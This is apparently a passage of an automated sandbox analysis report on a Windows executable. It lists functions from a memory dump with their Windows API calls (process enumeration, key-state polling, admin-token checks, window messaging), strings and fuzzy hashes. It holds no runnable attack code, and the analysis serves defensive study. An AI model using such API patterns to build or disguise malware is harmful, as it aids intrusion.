VUUU, xrefs: 0048C736
VUUU, xrefs: 00408FDD
ERCP, xrefs: 00408D68
VUUU, xrefs: 0040900A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 07eaf6b73819d1070db0a686b03ff5bb422a9dab7b5a7984ae16dde6d77c5f53
Instruction ID: cdef211bedbaf9a1631f69ba9609cf8b1a00bb5ebfb61f98ef204b131b4f4b17
Opcode Fuzzy Hash: 07eaf6b73819d1070db0a686b03ff5bb422a9dab7b5a7984ae16dde6d77c5f53
Instruction Fuzzy Hash: 5E928B70E0011A8BDF24DF68C9807AEB7B1AB54314F1485ABE855BB3C1D7789D81CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408530, Relevance: 11.0, APIs: 7, Instructions: 531COMMON

Download Yara Rule

APIs

Part of subcall function 0040A2FB: _memmove.LIBCMT ref: 0040A33D

_memmove.LIBCMT ref: 00408672
_memmove.LIBCMT ref: 004086C2
_memmove.LIBCMT ref: 00408728

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5f6d74691166cea65a0bc154d85c568084d86afd7c9be03b7403a69f62bee426
Instruction ID: 3c8524b271ee613ada2d4028bab6d604900596f5e1e64fb7020b54c59bdac201
Opcode Fuzzy Hash: 5f6d74691166cea65a0bc154d85c568084d86afd7c9be03b7403a69f62bee426
Instruction Fuzzy Hash: D6127E70A00609DFDF14DFA5DA81AEEB3F5FF48300F10856AE446E7291DB39A911CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0046FF91, Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

GetSystemMetrics.USER32(0000000F), ref: 0046FFCB
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 004701EB
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00470209
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00470234
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0047025D
ShowWindow.USER32(00000003,00000000), ref: 0047027F
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0047029E

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
String ID:
API String ID: 2922825909-0
Opcode ID: 022ad46964dc5a513b9da5fb539fce3a396c8906e05a22d880af98a6a1fc27cd
Instruction ID: 2d2b00dc39fd1734ac61cfce07cd33252422cd6988808820e40d71932e541b92
Opcode Fuzzy Hash: 022ad46964dc5a513b9da5fb539fce3a396c8906e05a22d880af98a6a1fc27cd
Instruction Fuzzy Hash: 8EA19C35601616EBDB18CF68C9857FEBBB1FB04700F04C16AEC58A7295D739AD50CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0046EAA6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

Part of subcall function 0041B736: GetCursorPos.USER32(000000FF), ref: 0041B749
Part of subcall function 0041B736: ScreenToClient.USER32(00000000,000000FF), ref: 0041B766
Part of subcall function 0041B736: GetAsyncKeyState.USER32(00000001), ref: 0041B78B
Part of subcall function 0041B736: GetAsyncKeyState.USER32(00000002), ref: 0041B799

ReleaseCapture.USER32 ref: 0046EB1A
SetWindowTextW.USER32(?,00000000), ref: 0046EBC2
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046EBD5
NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0046ECAE

Strings

@GUI_DRAGFILE, xrefs: 0046EC49
@GUI_DROPID, xrefs: 0046EC05

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 973565025-2107944366
Opcode ID: b72064e9b4f93e6840f5d16b3a182e2795b4f71244b0f127b4d7e7892e5a2b59
Instruction ID: 21af91294cd593c6e9548773624d184cffaf5a37c4effe472921fcdccb2a8664
Opcode Fuzzy Hash: b72064e9b4f93e6840f5d16b3a182e2795b4f71244b0f127b4d7e7892e5a2b59
Instruction Fuzzy Hash: 33519C34608304AFD700EF25CC96FAA3BE5FB88704F10492EF541972E2DB789904CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00446F5B, Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00446F7D
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00446F8D
Process32NextW.KERNEL32(00000000,0000022C), ref: 00446FAC
__wsplitpath.LIBCMT ref: 00446FD0
_wcscat.LIBCMT ref: 00446FE3
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00447022

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 6f4c9074037103a94e8d1fd0e179eb5575a0ec752bf62e941c112042ad9bbb09
Instruction ID: 679f920f851c7d25d9ddbbcbb8fc2ad7ce44907bf04b0966da4abfd04b16325a
Opcode Fuzzy Hash: 6f4c9074037103a94e8d1fd0e179eb5575a0ec752bf62e941c112042ad9bbb09
Instruction Fuzzy Hash: 312198B1905218ABEB10AF90DC88BEEB7BCAF05304F5004EAF505D3141E7759F85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00406670, Relevance: 8.1, APIs: 2, Strings: 2, Instructions: 1093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004067D0

Strings

hNK, xrefs: 0048216F
tMK, xrefs: 00482183

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: hNK$tMK
API String ID: 4104443479-3879046669
Opcode ID: aecda6a4ca6bdd9b7f695e35ec37f5e2dfd8439df41a6c71da403a8d058cfebf
Instruction ID: 45f76723af1750718d14f125c4f1d19254cf60d2a711a76f1fd1d22d612cda74
Opcode Fuzzy Hash: aecda6a4ca6bdd9b7f695e35ec37f5e2dfd8439df41a6c71da403a8d058cfebf
Instruction Fuzzy Hash: D3A27B71E00219CFCB24DF58C5806ADBBB1BF49314F2585AAD81AAB390D378AD91DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041B736, Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0041B749
ScreenToClient.USER32(00000000,000000FF), ref: 0041B766
GetAsyncKeyState.USER32(00000001), ref: 0041B78B
GetAsyncKeyState.USER32(00000002), ref: 0041B799

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 87c9057446f6ff85ad4a06dfd6e096cbe9d48a1269fdd26121f31a61ec10bef3
Instruction ID: 3e44c696b1b0686a9171548edd8672140eecb843ee2476d17db581a27c661c47
Opcode Fuzzy Hash: 87c9057446f6ff85ad4a06dfd6e096cbe9d48a1269fdd26121f31a61ec10bef3
Instruction Fuzzy Hash: EA418131A04119FFDF159F65C844EEABB74FB49324F10836BF829962D0C738A990DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00403EC5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,00403EBB,?,00403E91,?), ref: 00403ED3
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00403EE5

Strings

Wow64RevertWow64FsRedirection, xrefs: 00403EDF
kernel32.dll, xrefs: 00403ECE

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 6b53f089862f38f02bb52fd60feb5edd1b599a3d25dd80655a29de1b1addae5b
Instruction ID: 5e1ce226e7d089c303239fb1166c0f6ba72b89c4d096178fd86c655c63b8704f
Opcode Fuzzy Hash: 6b53f089862f38f02bb52fd60feb5edd1b599a3d25dd80655a29de1b1addae5b
Instruction Fuzzy Hash: 5AD0A7748003129FD7219F22E90C7577BD8EF1470AB10493FE445E12D8D7B8C4808768

Uniqueness

Uniqueness Score: -1.00%

Function 0046EFA8, Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

GetCursorPos.USER32(?), ref: 0046EFE2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0047F3C3,?,?,?,?,?), ref: 0046EFF7
GetCursorPos.USER32(?), ref: 0046F041
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0047F3C3,?,?,?), ref: 0046F077

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: 5679c3220a4a711a6799d0e350296eb8eb1c014cb1d73bddcb40bc052e61beb0
Instruction ID: 7abf500a9d74a50f01908925d8f018c583e8b9047db1f68fd774e370b6c9f1f8
Opcode Fuzzy Hash: 5679c3220a4a711a6799d0e350296eb8eb1c014cb1d73bddcb40bc052e61beb0
Instruction Fuzzy Hash: 6E213135600018BFCB258F54D898EEF7BB5EB0A350F04406AF805973A2E3389D51DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0046FF04, Relevance: 6.1, APIs: 4, Instructions: 53nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000020,?,?,?,?), ref: 0046FF85

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

GetClientRect.USER32(?,?), ref: 0046FF2F
GetCursorPos.USER32(?), ref: 0046FF39
ScreenToClient.USER32(?,?), ref: 0046FF44

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: 8f8b661bca6021a1b5f7e1dfc70cdeb4ceab7dcd1a6ad8fe1cb97412a1d3982b
Instruction ID: 7e2dc361381c74d45e9be985010c38309a5280f37a1439e70a7f8a7687ccb80e
Opcode Fuzzy Hash: 8f8b661bca6021a1b5f7e1dfc70cdeb4ceab7dcd1a6ad8fe1cb97412a1d3982b
Instruction Fuzzy Hash: 6C113335901419ABCF04DF54EC95CEE77B8FB06304B100867F551E3151E334A94ACBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCD0, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

G-@, xrefs: 0040DD94, 0040DF2B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: G-@
API String ID: 0-3697432872
Opcode ID: 53efba20e01fcf8043737f994789ad49a93e6957b91df2b9de8d18b6931e469c
Instruction ID: 04c4ea4772cec27732764cd071da78783bf68e16568bf47d54b45f6b19df755a
Opcode Fuzzy Hash: 53efba20e01fcf8043737f994789ad49a93e6957b91df2b9de8d18b6931e469c
Instruction Fuzzy Hash: 0922A070E002169FDB14DF99C480ABAB7F0FF14304F14C47AE84AAB391D779A985CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD5C, Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0041AE5E

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: e8404c7aebe15d741cf7f4406ed1df285c738f7d8160463eecfb075ee04220ed
Instruction ID: 78f400e6580f11f1889c4caf57952812868c79601fd4d04aee048bbf3130f03e
Opcode Fuzzy Hash: e8404c7aebe15d741cf7f4406ed1df285c738f7d8160463eecfb075ee04220ed
Instruction Fuzzy Hash: C4A16F74106304BADB24AB6A5C88DFF395DDB52344B10413FF845D62A2DA1CCCA6D2BF

Uniqueness

Uniqueness Score: -1.00%

Function 0043BE31, Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0043BE5A
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0043BE71
FreeSid.ADVAPI32(?), ref: 0043BE81

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction ID: 25ad0ee189ba551801388635a6f6cd26c8d945b80235a46f83908d51c3c597a8
Opcode Fuzzy Hash: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction Fuzzy Hash: 2CF01D76E01309BFDF04DFE4DD89AEEBBB8EF09305F104869A602E21D1E3749A449B14

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD92, Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(0040C848,0040C848), ref: 0041DDA2
FindFirstFileW.KERNEL32(0040C848,?), ref: 00474A83

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: File$AttributesFindFirst
String ID:
API String ID: 4185537391-0
Opcode ID: b1c0a9c4595e31c56889d3457cb78bde5f4c35756412b46ade566f2de8290e36
Instruction ID: 74fa071f3df1f0b465ba974a6007fcd902a59329b4d96f368706e8901833828f
Opcode Fuzzy Hash: b1c0a9c4595e31c56889d3457cb78bde5f4c35756412b46ade566f2de8290e36
Instruction Fuzzy Hash: 76E0D871C154015742146778EC4D8FE375C9E46338B100B1AF835C11E0EB749D4186DE

Uniqueness

Uniqueness Score: -1.00%

Function 0041AFB4, Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

Part of subcall function 0041B155: GetWindowLongW.USER32(?,000000EB), ref: 0041B166

GetParent.USER32(?), ref: 0047F4B5
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0041ADDD,?,?,?,00000006,?), ref: 0047F52F

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 5b3638361a633cccb40405e4733a683d785e2693de62e370b67239bf7d54cb8e
Instruction ID: 95963193542eb03d2ba0cbb5a02de4f2254a4a6a9a46123c9b8eebf27592f394
Opcode Fuzzy Hash: 5b3638361a633cccb40405e4733a683d785e2693de62e370b67239bf7d54cb8e
Instruction Fuzzy Hash: 652198352041047FCB249F28D944EEB3B92EB0A364F188266F529473F2D7349D52D759

Uniqueness

Uniqueness Score: -1.00%

Function 0046F0A1, Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0047F352,?,?,?), ref: 0046F115

Part of subcall function 0041B155: GetWindowLongW.USER32(?,000000EB), ref: 0041B166

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0046F0FB

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 9ba0a7ff539e987cb7cf4adac64b5d90bbef94713dad416d507d0003060392ae
Instruction ID: 037ee44d47789e0a6082a368e02fe9c175da99d97fbcaed7a3305614f63048ec
Opcode Fuzzy Hash: 9ba0a7ff539e987cb7cf4adac64b5d90bbef94713dad416d507d0003060392ae
Instruction Fuzzy Hash: D801F531200204EBCB21EF15EC45FAA3B66FB863A4F14452AF8450B3E2D7359C06DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0046F45A, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0046F47D
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0047F42E,?,?,?,?,?), ref: 0046F4A6

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 7bec4013d7e3db9b9dcd773d71618c9e69d3263e44b315a27ca59c35313e3887
Instruction ID: 50c29dde1fbd682093e9b8a1b6be2cd99d849123fa077e7811df1ecbbefed599
Opcode Fuzzy Hash: 7bec4013d7e3db9b9dcd773d71618c9e69d3263e44b315a27ca59c35313e3887
Instruction Fuzzy Hash: 9AF03A72801118FFEF049F95DC09DAE7FB8FF44351F10442AF902A21A0D7B5AA55EB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044D712, Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0045C2E2,?,?,00000000,?), ref: 0044D73F
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0045C2E2,?,?,00000000,?), ref: 0044D751

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
